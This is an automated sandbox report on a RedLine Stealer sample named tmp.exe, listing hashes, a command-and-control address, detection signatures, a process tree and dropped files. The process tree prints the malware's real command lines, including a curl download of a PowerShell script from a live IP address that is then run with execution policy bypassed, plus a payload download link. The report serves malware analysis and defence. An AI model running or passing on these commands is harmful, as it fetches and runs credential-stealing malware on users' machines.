Overview

overview

10

Static

static

tmp.exe

windows7-x64

10

tmp.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    15-12-2022 04:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tmp.exe

  • Size

    6KB

  • MD5

    285cbd341de6e17b42f1663245a58346

  • SHA1

    5281aa0f428bca4b5eeafda1b7eefc5735490d09

  • SHA256

    55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

  • SHA512

    4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d

  • SSDEEP

    96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Score
10/10
redlinespooferdiscoveryinfostealerspywarestealer

Malware Config

Extracted

Family

redline

Botnet

SPOOFER

C2

20.197.226.40:32619

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:956
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:520
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      C:\Users\Admin\AppData\Local\Temp\tmp.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
              PID:1860
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:696
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1692
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:968

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Data from Local System

    2
    T1005

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      61KB

      MD5

      fc4666cbca561e864e7fdf883a9e6661

      SHA1

      2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

      SHA256

      10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

      SHA512

      c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      c4ded0ce41b04af7da39b1f4e5507dfa

      SHA1

      03f3beecb9efcaeba571339be5462762ddc49007

      SHA256

      06383a01ae2a8e3d12e84e16fd4543d9d907500db4f1dc1253ff552a26f47ddc

      SHA512

      5615569fba9e64016d2079daf32debbc9f93ffd55bf2163cc69c2f13a51ccb6e87a248deed045665a487e2cc6bf1b794e9f85fdbb3da8fd81ee1e921678ace87

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\updeter.vbs
      Filesize

      112KB

      MD5

      8b50289dfca4b0f572536e3ff6b51b96

      SHA1

      8fac95861b2803dcae74709b08361c4e89e8ae86

      SHA256

      0b0c649fca400195a96031b16acc9b002d9556520c7e61f689967fd46eb058c8

      SHA512

      da5f11ebad71aaa8389f3c250ec06a54ff29b869bb738d6c61eaa7032b359bcfebfdbaa807b886aa02f8d15745f02b1162ef7774457a4911b7b9eb1a20f81acc

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IB3YVFD2.txt
      Filesize

      601B

      MD5

      cc1b450deaad6bfd2271813094c7f72d

      SHA1

      1877afa62eaa766f023c11ed0cc8147b4e0d19f0

      SHA256

      8810d92da9d1111d57a6a5d999bfe6bd429e68794e561811b14062ff86ff6e22

      SHA512

      67da3aa28e3d6222acca4b5be4c0172e1503b450327b774d36f77f2b3b4f16c340078f2ba0ca55c2c3bde9c827ef5a517d9650d95648c72dee8ef555b86aecd3

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      3a07363d9602bf51fdd1cfef1107ec8e

      SHA1

      23837e804ed6cf2395a1f36deec69f5ed41a399d

      SHA256

      80363928eb3c071a16dc92f9e3d10c7c9da69adb6a4e7269d0cfb2cad0a57431

      SHA512

      2a5fa399cc40ae9049e912ac354dd7164e50140ba5323c346cd980dbc9e6f4d741c25b6078b4d4c4bd1809bcc50d1253c5c816cbb3a6c79bc1659dedf2595b5a

      Download Submit
    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      Download Submit
    • \Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

      Download Submit
    • memory/520-64-0x0000000000000000-mapping.dmp
      Download
    • memory/520-84-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

      Download
    • memory/520-83-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

      Download
    • memory/520-79-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

      Download
    • memory/532-85-0x0000000000000000-mapping.dmp
      Download
    • memory/696-91-0x0000000000000000-mapping.dmp
      Download
    • memory/956-60-0x000000006EA20000-0x000000006EFCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/956-58-0x0000000000000000-mapping.dmp
      Download
    • memory/956-61-0x000000006EA20000-0x000000006EFCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/956-62-0x000000006EA20000-0x000000006EFCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1504-57-0x0000000000750000-0x00000000007E2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/1504-54-0x0000000001050000-0x0000000001058000-memory.dmp
      Filesize

      32KB

      Download
    • memory/1504-56-0x0000000008CE0000-0x00000000096F0000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1504-55-0x00000000768A1000-0x00000000768A3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1564-90-0x0000000000000000-mapping.dmp
      Download
    • memory/1692-92-0x0000000000000000-mapping.dmp
      Download
    • memory/1692-97-0x00000000746D0000-0x0000000074C7B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1692-96-0x00000000746D0000-0x0000000074C7B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1704-67-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-69-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-66-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-74-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-76-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-70-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-71-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1704-72-0x000000000041933E-mapping.dmp
      Download
    • memory/1784-88-0x0000000000000000-mapping.dmp
      Download
    • memory/1860-89-0x0000000000000000-mapping.dmp
      Download